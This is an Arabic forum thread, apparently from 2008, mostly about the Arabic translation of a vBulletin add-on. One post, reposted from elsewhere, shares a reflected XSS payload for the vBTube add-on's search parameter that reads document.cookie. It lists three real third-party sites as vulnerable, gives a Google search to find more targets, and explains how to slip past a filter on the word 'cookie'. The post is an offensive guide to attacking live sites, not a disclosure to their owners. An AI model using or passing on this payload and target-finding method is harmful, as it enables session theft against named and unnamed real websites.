هذا ايضا غير معرب كاملا
شوف تاكد منه
نورتم الموضوع وحياكم الله
عرض للطباعة
هذا ايضا غير معرب كاملا
شوف تاكد منه
نورتم الموضوع وحياكم الله
أخي بارك الله بك ليس هناك أي تعريب فهاك هو بلغة الانجليزية
وعليك الدليل أخي
https://mwadah.com/images/imgcache/2008/07/672.jpg
[BIMG]http://www.mwadah.com/attachment.php?attachment id=8363&stc=1&d=121565438 8[/BIMG]
https://mwadah.com/images/imgcache/2008/07/673.jpg
المشكلة انه اللي معرب الهاك معربه على ملف التعريب واللي هو يتغير من منتدى لآخر وكان المفروض يغيره من الهاك نفسه بواسطة احدى البرامج الموجودة لتحرير نصوص الكودات
نورتم الموضوع وحياكم الله
بسم الله الرحمن الرحيم
اخواني جايب لكم ثغرة جديدة واتمنى تنال اعجابكم
Vbulletin Tube (vBTube) XSS
الثغرة :
كود:
vBTube.php?do=search&sear ch=<script>alert(document .c ookie);</script>
اي منتدى مركب هاك اليوتيوب مصاب بها معظم المواقع وكثيرة
امثلة على مواقع مصابة :
كود:
http://www.ruhot.ru/forum/vBTube.php...ert(document.c ookie);%3C/script%3E
كود:
http://www.reno4x4.com/forum/vBTube....ert(document.c ookie);%3C/script%3E
كود:
http://odfmovies.com/Forums/vBTube.p...ert(document.c ookie);%3C/script%3E
طبعا اذا كان في ناس مركبين الهاك
انت بس ضيف الكود هذا بدل
www.xxx.com/vBTube.php
احذف vBTube.php
وحط هذا الكود
كود:
vBTube.php?do=search&sear ch=<script>alert(document .******);</script>
اتمنى تكون الفكرة وصلة
كود البحث في جوجل :
كود:
inurl:vBTube.php
في فراغ سويته في كلمة
كود:
c ookie
في فراغ بين حرف السي وحرف ال O شيل الفراغ بس http://www.mwadah.com/images/imgcache/2008/07/275.gif
القنبلة المؤقتة http://www.mwadah.com/images/imgcache/2008/07/276.gif
منقوووووووول
يعطيك الف عافيه .... عربته انا بس وجدت مشكله بالترميز وهونت :mwan63:
الف شكر :) :mwan14: